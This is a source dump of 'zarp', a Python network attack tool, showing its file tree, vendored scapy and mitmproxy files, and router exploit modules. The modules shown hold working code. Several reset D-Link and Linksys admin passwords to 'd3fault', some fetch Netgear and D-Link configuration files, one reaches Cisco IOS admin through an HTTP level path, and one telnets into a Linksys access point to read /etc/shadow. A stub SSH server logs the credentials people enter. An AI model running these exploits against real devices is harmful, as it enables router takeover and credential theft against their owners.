├── src ├── modules │ ├── __init__.py │ ├── parameter │ │ ├── routers │ │ │ ├── asus │ │ │ │ ├── __init__.py │ │ │ │ └── rt56u_change_admin.py │ │ │ ├── rosewill │ │ │ │ ├── __init__.py │ │ │ │ └── rsva_backdoor.py │ │ │ ├── zoom │ │ │ │ ├── __init__.py │ │ │ │ └── x4_5_mod_password.py │ │ │ ├── cisco │ │ │ │ ├── __init__.py │ │ │ │ ├── ios_full_admin.py │ │ │ │ └── kits_dtraverse.py │ │ │ ├── netgear │ │ │ │ ├── __init__.py │ │ │ │ ├── wpn824v3_get_config.py │ │ │ │ └── wnr2000_get_pass.py │ │ │ ├── linksys │ │ │ │ ├── __init__.py │ │ │ │ ├── wap610n_dump.py │ │ │ │ ├── wrt54g_reset_admin.py │ │ │ │ └── wag54gs_change_admin.py │ │ │ ├── __init__.py │ │ │ ├── dlink │ │ │ │ ├── __init__.py │ │ │ │ ├── get_config_320b.py │ │ │ │ ├── change_admin_2640.py │ │ │ │ ├── add_admin_605.py │ │ │ │ ├── add_admin_300.py │ │ │ │ ├── change_admin_1310.py │ │ │ │ └── backdoor_250n.py │ │ │ ├── default_passwords.py │ │ │ └── router_vuln.py │ │ ├── __init__.py │ │ ├── parameter.py │ │ ├── router_pwn.py │ │ ├── ap_crack.py │ │ ├── switchover.py │ │ └── slarpc.py │ ├── poison │ │ ├── __init__.py │ │ ├── poison.py │ │ ├── icmp.py │ │ ├── nbns.py │ │ └── llmnr.py │ ├── scanner │ │ ├── __init__.py │ │ ├── scanner.py │ │ ├── ap_scan.py │ │ ├── net_map.py │ │ └── passive_scan.py │ ├── services │ │ ├── __init__.py │ │ ├── service.py │ │ ├── stubssh.py │ │ ├── access_point.py │ │ ├── telnet.py │ │ └── ftp.py │ ├── sniffer │ │ ├── __init__.py │ │ ├── traffic_sniffer.py │ │ ├── sniffer.py │ │ ├── password_parser.py │ │ └── parser_postgres.py │ ├── dos │ │ ├── __init__.py │ │ ├── dos.py │ │ ├── land_dos.py │ │ ├── igmp_nix.py │ │ ├── nestea_dos.py │ │ ├── dhcp_starvation.py │ │ ├── tcp_syn.py │ │ ├── smb2_dos.py │ │ ├── nud.py │ │ └── ndp_dos.py │ └── attacks │ │ ├── attack.py │ │ ├── __init__.py │ │ ├── redirect_port.py │ │ └── beef_hook.py ├── lib │ ├── libmproxy │ │ ├── __init__.py │ │ ├── contrib │ │ │ ├── __init__.py │ │ │ ├── README │ │ │ └── jsbeautifier │ │ │ │ └── unpackers │ │ │ │ ├── README.specs.mkd │ │ │ │ ├── urlencode.py │ │ │ │ ├── evalbased.py │ │ │ │ ├── javascriptobfuscator.py │ │ │ │ ├── __init__.py │ │ │ │ ├── myobfuscate.py │ │ │ │ └── packer.py │ │ ├── app.py │ │ ├── version.py │ │ ├── platform │ │ │ ├── __init__.py │ │ │ ├── linux.py │ │ │ ├── pf.py │ │ │ └── osx.py │ │ ├── script.py │ │ ├── encoding.py │ │ └── console │ │ │ └── flowdetailview.py │ └── scapy │ │ ├── layers │ │ ├── __init__.py │ │ ├── gprs.py │ │ ├── all.py │ │ ├── hsrp.py │ │ ├── l2tp.py │ │ ├── rip.py │ │ ├── rtp.py │ │ ├── ir.py │ │ ├── netflow.py │ │ ├── mgcp.py │ │ ├── mobileip.py │ │ ├── llmnr.py │ │ ├── ntp.py │ │ ├── pflog.py │ │ ├── radius.py │ │ └── x509.py │ │ ├── modules │ │ ├── __init__.py │ │ ├── geoip.py │ │ └── queso.py │ │ ├── tools │ │ ├── __init__.py │ │ └── check_asdis.py │ │ ├── crypto │ │ └── __init__.py │ │ ├── arch │ │ ├── bsd.py │ │ ├── solaris.py │ │ └── __init__.py │ │ ├── __init__.py │ │ ├── asn1 │ │ └── __init__.py │ │ ├── asn1packet.py │ │ ├── all.py │ │ ├── error.py │ │ ├── dadict.py │ │ ├── pton_ntop.py │ │ ├── as_resolvers.py │ │ ├── supersocket.py │ │ └── ansmachine.py ├── __init__.py └── core │ ├── __init__.py │ ├── colors.py │ ├── zoption.py │ ├── session_manager.py │ ├── parse_cmd.py │ └── database.py ├── .gitignore ├── requirements.txt ├── clean.sh ├── CONTRIBUTORS ├── config ├── zarp.conf └── replacements └── LICENSE /src/modules/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/lib/libmproxy/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/lib/libmproxy/contrib/__init__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /src/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | -------------------------------------------------------------------------------- /src/core/__init__.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Ignore compiled python files 2 | *.py[cod] 3 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | Flask==1.0 2 | netlib==0.11.1 3 | paramiko==2.10.1 4 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/asus/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ['rt56u_change_admin'] 2 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/rosewill/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ['rsva_backdoor'] 2 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/zoom/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ['x4_5_mod_password'] 2 | -------------------------------------------------------------------------------- /src/modules/poison/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ["arp","dns","dhcp","nbns","llmnr","icmp"] 2 | -------------------------------------------------------------------------------- /src/modules/parameter/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ['ap_crack','router_pwn', 'slarpc','switchover'] 2 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/cisco/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 'kits_dtraverse', 'ios_full_admin' ] 2 | -------------------------------------------------------------------------------- /src/modules/scanner/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 'ap_scan', 'net_map', 'service_scan', 'passive_scan'] 2 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/netgear/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ['wnr2000_get_pass', 'wpn824v3_get_config'] 2 | -------------------------------------------------------------------------------- /src/modules/services/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ['access_point', 'ftp', 'http', 'smb', 'ssh', 2 | 'telnet'] 3 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/linksys/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = [ 'wap610n_dump', 'wrt54g_reset_admin', 'wag54gs_change_admin' ] 2 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ['cisco', 'dlink', 'linksys', 'netgear', 'asus', 2 | 'rosewill', 'zoom'] 3 | -------------------------------------------------------------------------------- /src/modules/sniffer/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ['http_sniffer', 'password_sniffer', 'traffic_sniffer', 2 | 'database_sniffer'] 3 | -------------------------------------------------------------------------------- /clean.sh: -------------------------------------------------------------------------------- 1 | # clean my directories; prevent accidental rm -f *.py 2 | find ./ -iname *.pyc -exec rm -f '{}' ';' 3 | rm -f ./zarp_debug.log 4 | -------------------------------------------------------------------------------- /src/lib/libmproxy/app.py: -------------------------------------------------------------------------------- 1 | import flask 2 | 3 | mapp = flask.Flask(__name__) 4 | 5 | @mapp.route("/") 6 | def hello(): 7 | return "mitmproxy" 8 | -------------------------------------------------------------------------------- /src/modules/dos/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ["dhcp_starvation", "land_dos", "ndp_dos", "nestea_dos", 2 | "smb2_dos", "tcp_syn", 'nud', 'igmp_nix'] 3 | -------------------------------------------------------------------------------- /src/lib/libmproxy/version.py: -------------------------------------------------------------------------------- 1 | IVERSION = (0, 9, 1) 2 | VERSION = ".".join(str(i) for i in IVERSION) 3 | NAME = "mitmproxy" 4 | NAMEVERSION = NAME + " " + VERSION 5 | -------------------------------------------------------------------------------- /CONTRIBUTORS: -------------------------------------------------------------------------------- 1 | Thanks to the following users for their contributions to zarp 2 | ============================================================== 3 | NullMode 4 | z4ck 5 | bwall 6 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/dlink/__init__.py: -------------------------------------------------------------------------------- 1 | __all__ = ['backdoor_250n', 'change_admin_2640', 'add_admin_300', 2 | 'add_admin_605', 'change_admin_1310', 'get_config_320b' 3 | ] 4 | -------------------------------------------------------------------------------- /src/modules/parameter/parameter.py: -------------------------------------------------------------------------------- 1 | from module import ZarpModule 2 | 3 | 4 | class Parameter(ZarpModule): 5 | """ Abstract parameter 6 | """ 7 | def __init__(self, which): 8 | super(Parameter, self).__init__(which) -------------------------------------------------------------------------------- /src/lib/scapy/layers/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | -------------------------------------------------------------------------------- /src/lib/scapy/modules/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | -------------------------------------------------------------------------------- /src/lib/scapy/tools/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | -------------------------------------------------------------------------------- /src/lib/libmproxy/platform/__init__.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | resolver = None 4 | if sys.platform == "linux2": 5 | import linux 6 | resolver = linux.Resolver 7 | elif sys.platform == "darwin": 8 | import osx 9 | resolver = osx.Resolver 10 | -------------------------------------------------------------------------------- /src/lib/scapy/crypto/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Arnaud Ebalard 4 | ## This program is published under a GPLv2 license 5 | 6 | __all__ = ["cert"] 7 | -------------------------------------------------------------------------------- /src/modules/attacks/attack.py: -------------------------------------------------------------------------------- 1 | from module import ZarpModule 2 | import abc 3 | 4 | 5 | class Attack(ZarpModule): 6 | """Abstract attack class""" 7 | __metaclass__ = abc.ABCMeta 8 | 9 | def __init__(self, which): 10 | super(Attack, self).__init__(which) -------------------------------------------------------------------------------- /src/modules/attacks/__init__.py: -------------------------------------------------------------------------------- 1 | from os.path import basename, dirname, abspath 2 | from glob import glob 3 | 4 | __all__ = [i for i in (basename(f)[:-3] for f in glob(dirname(abspath(__file__))+"/*.py")) if i != "__init__" and i != "attack"] 5 | __all__ = [v for v in __all__ if not v == "__init__"] 6 | -------------------------------------------------------------------------------- /src/lib/scapy/arch/bsd.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | 8 | LOOPBACK_NAME="lo0" 9 | 10 | from unix import * 11 | -------------------------------------------------------------------------------- /src/lib/scapy/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | 8 | if __name__ == "__main__": 9 | from scapy.main import interact 10 | interact() 11 | -------------------------------------------------------------------------------- /config/zarp.conf: -------------------------------------------------------------------------------- 1 | # 2 | # zarp configuration file 3 | # 4 | debug=False 5 | log=zarp_debug.log 6 | 7 | # database configuration; ignored with sqlite3 8 | db_ip=localhost 9 | db_port=5432 10 | db_usr=zarp 11 | db_pw=default 12 | 13 | # 14 | # options: sqlite, mysql, pgsql 15 | # sqlite3 database stored at config/zarp.db 16 | # 17 | db_con=sqlite3 18 | -------------------------------------------------------------------------------- /src/lib/scapy/asn1/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | # We do not import mib.py because it is more bound to scapy and 7 | # less prone to be used in a standalone fashion 8 | __all__ = ["asn1","ber"] 9 | -------------------------------------------------------------------------------- /src/lib/scapy/arch/solaris.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | # IPPROTO_GRE is missing on Solaris 8 | import socket 9 | socket.IPPROTO_GRE = 47 10 | 11 | LOOPBACK_NAME="lo0" 12 | 13 | from unix import * 14 | -------------------------------------------------------------------------------- /src/lib/libmproxy/contrib/README: -------------------------------------------------------------------------------- 1 | 2 | Contribs: 3 | 4 | 5 | pyparsing 1.5.2, MIT license 6 | 7 | jsbeautifier, git checkout 25/03/12, MIT license 8 | - Removed test directories 9 | - Disabled packers through a single-line modification (see "# CORTESI" 10 | comment) 11 | 12 | html2text, git checkout 18/08/12, GPLv3 13 | 14 | md5crypt, PSF license, http://code.activestate.com/recipes/325204/ 15 | 16 | -------------------------------------------------------------------------------- /src/lib/libmproxy/platform/linux.py: -------------------------------------------------------------------------------- 1 | import socket, struct, fcntl 2 | 3 | # Python socket module does not have this constant 4 | SO_ORIGINAL_DST = 80 5 | 6 | class Resolver: 7 | def original_addr(self, csock): 8 | odestdata = csock.getsockopt(socket.SOL_IP, SO_ORIGINAL_DST, 16) 9 | _, port, a1, a2, a3, a4 = struct.unpack("!HHBBBBxxxxxxxx", odestdata) 10 | address = "%d.%d.%d.%d" % (a1, a2, a3, a4) 11 | return address, port 12 | -------------------------------------------------------------------------------- /src/modules/poison/poison.py: -------------------------------------------------------------------------------- 1 | from module import ZarpModule 2 | import util 3 | 4 | 5 | class Poison(ZarpModule): 6 | """ Abstract poison module 7 | """ 8 | def __init__(self, which): 9 | super(Poison, self).__init__(which) 10 | 11 | def test_stop(self): 12 | """ Callback for stopping a sniffer 13 | """ 14 | if self.running: 15 | return False 16 | util.debug("Stopping sniffer threads for %s.." % self.which) 17 | return True -------------------------------------------------------------------------------- /src/lib/scapy/layers/gprs.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | from scapy.fields import * 8 | from scapy.packet import * 9 | from scapy.layers.inet import IP 10 | 11 | class GPRS(Packet): 12 | name = "GPRSdummy" 13 | fields_desc = [ 14 | StrStopField("dummy","","\x65\x00\x00",1) 15 | ] 16 | 17 | 18 | bind_layers( GPRS, IP, ) 19 | -------------------------------------------------------------------------------- /src/lib/libmproxy/platform/pf.py: -------------------------------------------------------------------------------- 1 | 2 | def lookup(address, port, s): 3 | """ 4 | Parse the pfctl state output s, to look up the destination host 5 | matching the client (address, port). 6 | 7 | Returns an (address, port) tuple, or None. 8 | """ 9 | spec = "%s:%s"%(address, port) 10 | for i in s.split("\n"): 11 | if "ESTABLISHED:ESTABLISHED" in i and spec in i: 12 | s = i.split() 13 | if len(s) > 4: 14 | s = s[4].split(":") 15 | if len(s) == 2: 16 | return s[0], int(s[1]) 17 | -------------------------------------------------------------------------------- /src/lib/scapy/layers/all.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.config import conf 7 | from scapy.error import log_loading 8 | 9 | def _import_star(m): 10 | mod = __import__(m, globals(), locals()) 11 | for k,v in mod.__dict__.iteritems(): 12 | globals()[k] = v 13 | 14 | for _l in conf.load_layers: 15 | log_loading.debug("Loading layer %s" % _l) 16 | _import_star(_l) 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /src/lib/scapy/asn1packet.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from packet import * 7 | 8 | class ASN1_Packet(Packet): 9 | ASN1_root = None 10 | ASN1_codec = None 11 | def init_fields(self): 12 | flist = self.ASN1_root.get_fields_list() 13 | self.do_init_fields(flist) 14 | self.fields_desc = flist 15 | def do_build(self): 16 | return self.ASN1_root.build(self) 17 | def do_dissect(self, x): 18 | return self.ASN1_root.dissect(self, x) 19 | 20 | 21 | -------------------------------------------------------------------------------- /src/modules/scanner/scanner.py: -------------------------------------------------------------------------------- 1 | from module import ZarpModule 2 | from util import init_app 3 | from re import search 4 | import abc 5 | 6 | 7 | class Scanner(ZarpModule): 8 | """Abstract scanner 9 | """ 10 | __metaclass__ = abc.ABCMeta 11 | 12 | def __init__(self, which): 13 | self.target = None 14 | super(Scanner, self).__init__(which) 15 | 16 | def is_alive(self): 17 | """ Check if the target is responding 18 | """ 19 | if not self.target is None: 20 | rval = init_app('ping -c 1 -w 1 %s' % self.target) 21 | up = search('\d.*? received', rval) 22 | if search('0', up.group(0)) is None: 23 | return True 24 | return False -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | ZARP NETWORK ATTACK TOOL 2 | Copyright (C) 2012 - 2014 drone 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | (at your option) any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | -------------------------------------------------------------------------------- /src/modules/services/service.py: -------------------------------------------------------------------------------- 1 | from module import ZarpModule 2 | from zoption import Zoption 3 | import abc 4 | 5 | 6 | class Service(ZarpModule): 7 | """Abstract service 8 | """ 9 | __metaclass__ = abc.ABCMeta 10 | 11 | def __init__(self, which): 12 | super(Service, self).__init__(which) 13 | self.config.update({"port":Zoption(type="int", 14 | value = None, 15 | required = False, 16 | display = "Listen port") 17 | }) 18 | 19 | @abc.abstractmethod 20 | def initialize_bg(self): 21 | """ When services are initialized from the CLI, 22 | they need to be run in their own thread 23 | """ 24 | raise NotImplementedError 25 | -------------------------------------------------------------------------------- /src/lib/libmproxy/platform/osx.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import pf 3 | 4 | """ 5 | Doing this the "right" way by using DIOCNATLOOK on the pf device turns out 6 | to be a pain. Apple has made a number of modifications to the data 7 | structures returned, and compiling userspace tools to test and work with 8 | this turns out to be a pain in the ass. Parsing pfctl output is short, 9 | simple, and works. 10 | """ 11 | 12 | class Resolver: 13 | STATECMD = ("sudo", "-n", "/sbin/pfctl", "-s", "state") 14 | def __init__(self): 15 | pass 16 | 17 | def original_addr(self, csock): 18 | peer = csock.getpeername() 19 | try: 20 | stxt = subprocess.check_output(self.STATECMD, stderr=subprocess.STDOUT) 21 | except subprocess.CalledProcessError: 22 | return None 23 | return pf.lookup(peer[0], peer[1], stxt) 24 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/dlink/get_config_320b.py: -------------------------------------------------------------------------------- 1 | import util 2 | import urllib 3 | from ..router_vuln import RouterVuln 4 | 5 | class get_config_320b(RouterVuln): 6 | 7 | def __init__(self): 8 | self.router = 'DSL-320B' 9 | self.vuln = 'Read Configuration File' 10 | super(get_config_320b, self).__init__() 11 | 12 | self.info = """ 13 | Read the configuration file 14 | http://www.exploit-db.com/exploits/25251/ 15 | """ 16 | 17 | def initialize(self): 18 | util.Msg('Fetching config from %s...' % self.config['target'].value) 19 | url = 'http://%s/config.bin' % self.config['target'].value 20 | try: 21 | response = urllib.urlopen(url).read() 22 | util.Msg(response) 23 | except Exception, e: 24 | util.Error('Error: %s' % e) 25 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/netgear/wpn824v3_get_config.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import util 3 | from ..router_vuln import RouterVuln 4 | 5 | 6 | class wpn824v3_get_config(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'WPN824v3' 10 | self.vuln = 'Read Configuration File' 11 | super(wpn824v3_get_config, self).__init__() 12 | 13 | self.info = """ 14 | Read the configuration file 15 | http://www.exploit-db.com/exploits/25969/ 16 | """ 17 | 18 | def initialize(self): 19 | util.Msg('Fetching config from %s...' % self.config['target'].value) 20 | url = 'http://%s/cgi-bin/NETGEAR_wpn824v3.cfg' % self.config['target'].value 21 | try: 22 | response = urllib.urlopen(url).read() 23 | util.Msg(response) 24 | except Exception, e: 25 | util.Error('Error: %s' % e) 26 | -------------------------------------------------------------------------------- /src/lib/scapy/layers/hsrp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.fields import * 7 | from scapy.packet import * 8 | from scapy.layers.inet import UDP 9 | 10 | class HSRP(Packet): 11 | name = "HSRP" 12 | fields_desc = [ 13 | ByteField("version", 0), 14 | ByteEnumField("opcode", 0, { 0:"Hello"}), 15 | ByteEnumField("state", 16, { 16:"Active"}), 16 | ByteField("hellotime", 3), 17 | ByteField("holdtime", 10), 18 | ByteField("priority", 120), 19 | ByteField("group", 1), 20 | ByteField("reserved", 0), 21 | StrFixedLenField("auth","cisco",8), 22 | IPField("virtualIP","192.168.1.1") ] 23 | 24 | 25 | 26 | 27 | 28 | bind_layers( UDP, HSRP, dport=1985, sport=1985) 29 | -------------------------------------------------------------------------------- /src/modules/services/stubssh.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import util 3 | 4 | 5 | class SSHStub(paramiko.ServerInterface): 6 | """ Handler for credentials 7 | """ 8 | def __init__(self, context, *args): 9 | self.context = context 10 | paramiko.ServerInterface.__init__(self, *args) 11 | 12 | # handle credentials and always reject 13 | def check_auth_password(self, username, password): 14 | if self.context['dump']: 15 | util.Msg('Received login attempt: %s:%s' % (username, password)) 16 | if self.context['log_data']: 17 | self.context['log_file'].write('Received login: %s:%s\n' 18 | % (username, password)) 19 | self.context['log_file'].flush() 20 | return paramiko.AUTH_FAILED 21 | 22 | def check_channel_request(self, kind, chanid): 23 | return paramiko.OPEN_SUCCEEDED 24 | 25 | 26 | class SSHHandler(paramiko.SFTPServerInterface): 27 | pass 28 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/linksys/wap610n_dump.py: -------------------------------------------------------------------------------- 1 | import telnetlib 2 | import util 3 | from ..router_vuln import RouterVuln 4 | 5 | 6 | class wap610n_dump(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'WAP610N v1.0.01' 10 | self.vuln = 'Unauthenticated File Disclosure' 11 | super(wap610n_dump, self).__init__() 12 | 13 | self.info = """ 14 | Unauthenticated root access over telnet 15 | http://www.exploit-db.com/exploits/16149/ 16 | """ 17 | 18 | def initialize(self): 19 | util.Msg('Retrieving shadow...') 20 | try: 21 | tn = telnetlib.Telnet(self.config['target'].value) 22 | tn.read_until('Command> ') 23 | tn.write('system cat /etc/shadow\n') 24 | data = tn.read_all() 25 | tn.write('exit\n') 26 | except Exception, e: 27 | util.Error("Error: %s" % e) 28 | return 29 | print data 30 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/dlink/change_admin_2640.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import util 3 | from ..router_vuln import RouterVuln 4 | 5 | 6 | class change_admin_2640(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'DSL-2640B' 10 | self.vuln = 'Change Admin Password' 11 | super(change_admin_2640, self).__init__() 12 | 13 | self.info = """ 14 | Modify the admin password. 15 | http://www.exploit-db.com/exploits/18499/ 16 | """ 17 | 18 | def initialize(self): 19 | util.Msg('Changing admin password to \'d3fault\'...') 20 | try: 21 | url = 'http://%s/redpass.cgi?sysPassword=d3fault&change=1' \ 22 | % self.config['target'].value 23 | urllib.urlopen(url).read() 24 | util.Msg('Done. Admin password changed to \'d3fault\'') 25 | except Exception, e: 26 | util.Error('Error: %s' % e) 27 | return 28 | -------------------------------------------------------------------------------- /src/lib/scapy/all.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | from base_classes import * 8 | from config import * 9 | from dadict import * 10 | from data import * 11 | from error import * 12 | from themes import * 13 | from arch import * 14 | 15 | from plist import * 16 | from fields import * 17 | from packet import * 18 | from asn1fields import * 19 | from asn1packet import * 20 | 21 | from utils import * 22 | from route import * 23 | if conf.ipv6_enabled: 24 | from utils6 import * 25 | from route6 import * 26 | from sendrecv import * 27 | from supersocket import * 28 | from volatile import * 29 | from as_resolvers import * 30 | 31 | from ansmachine import * 32 | from automaton import * 33 | from autorun import * 34 | 35 | from main import * 36 | 37 | from layers.all import * 38 | 39 | from asn1.asn1 import * 40 | from asn1.ber import * 41 | from asn1.mib import * 42 | 43 | 44 | 45 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/cisco/ios_full_admin.py: -------------------------------------------------------------------------------- 1 | from ..router_vuln import RouterVuln 2 | import util 3 | import urllib 4 | 5 | 6 | class ios_full_admin(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'Cisco IOS 11.x/12.x' 10 | self.vuln = 'Full Admin' 11 | super(ios_full_admin, self).__init__() 12 | 13 | self.info = """ 14 | Exploit a remote admin vulnerability in Cisco IOS 11.x/12.x routers 15 | http://www.exploit-db.com/exploits/20975/ 16 | """ 17 | 18 | def initialize(self): 19 | url = 'http://%s/level/' % (self.config['target'].value) 20 | for idx in range(16, 100): 21 | url += str(idx) + '/exec/-' 22 | response = urllib.urlopen(url).read() 23 | if '200 ok' in response.lower(): 24 | util.Msg('Device vulnerable. Connect to %s for admin' 25 | % (self.config['target'].value)) 26 | return 27 | util.Msg('Device not vulnerable.') 28 | return 29 | -------------------------------------------------------------------------------- /src/modules/dos/dos.py: -------------------------------------------------------------------------------- 1 | from module import ZarpModule 2 | from util import init_app 3 | from re import search 4 | from util import Error 5 | from zoption import Zoption 6 | import abc 7 | 8 | 9 | class DoS(ZarpModule): 10 | """Abstract denial of service class""" 11 | __metaclass__ = abc.ABCMeta 12 | 13 | def __init__(self, which): 14 | super(DoS, self).__init__(which) 15 | self.config.update({"target":Zoption(type = "ip", 16 | value = None, 17 | required = True, 18 | display = "Target to DoS") 19 | }) 20 | 21 | def is_alive(self): 22 | """Check if the target is alive""" 23 | if not self.config['target'].value is None: 24 | rval = init_app('ping -c 1 -w 1 %s' % \ 25 | self.config['target'].value, True) 26 | up = search('\d.*? received', rval) 27 | if search('0', up.group(0)) is None: 28 | return True 29 | return False -------------------------------------------------------------------------------- /src/lib/scapy/layers/l2tp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import struct 7 | 8 | from scapy.packet import * 9 | from scapy.fields import * 10 | from scapy.layers.inet import UDP 11 | from scapy.layers.ppp import PPP 12 | 13 | class L2TP(Packet): 14 | fields_desc = [ ShortEnumField("pkt_type",2,{2:"data"}), 15 | ShortField("len", None), 16 | ShortField("tunnel_id", 0), 17 | ShortField("session_id", 0), 18 | ShortField("ns", 0), 19 | ShortField("nr", 0), 20 | ShortField("offset", 0) ] 21 | 22 | def post_build(self, pkt, pay): 23 | if self.len is None: 24 | l = len(pkt)+len(pay) 25 | pkt = pkt[:2]+struct.pack("!H", l)+pkt[4:] 26 | return pkt+pay 27 | 28 | 29 | bind_layers( UDP, L2TP, sport=1701, dport=1701) 30 | bind_layers( L2TP, PPP, ) 31 | -------------------------------------------------------------------------------- /src/modules/parameter/routers/linksys/wrt54g_reset_admin.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import util 3 | from ..router_vuln import RouterVuln 4 | 5 | 6 | class wrt54g_reset_admin(RouterVuln): 7 | 8 | def __init__(self): 9 | self.router = 'WRT54G v1.00.9' 10 | self.vuln = 'Reset Password' 11 | super(wrt54g_reset_admin, self).__init__() 12 | 13 | self.info = """Reset admin password 14 | http://www.exploit-db.com/exploits/5313/ 15 | """ 16 | 17 | def initialize(self): 18 | util.Msg('Resetting admin password to \'d3fault\'...') 19 | try: 20 | url = 'http://%s/manage.tri?remote_mg_https=0&http_enable=1&https_enable=0' \ 21 | '&PasswdModify=1&http_passwd=d3fault&http_passwdConfirm=d3fault' \ 22 | '&_http_enable=1&web_wl_filter=1&remote_management=0&upnp=_enable=1'\ 23 | '&layout=en' % self.config['target'].value 24 | urllib.urlopen(url).read() 25 | util.Msg('Done') 26 | except Exception, e: 27 | util.Error('Error: %s' % e) 28 | return 29 | -------------------------------------------------------------------------------- /src/lib/libmproxy/contrib/jsbeautifier/unpackers/README.specs.mkd: -------------------------------------------------------------------------------- 1 | # UNPACKERS SPECIFICATIONS 2 | 3 | Nothing very difficult: an unpacker is a submodule placed in the directory 4 | where this file was found. Each unpacker must define three symbols: 5 | 6 | * `PRIORITY` : integer number expressing the priority in applying 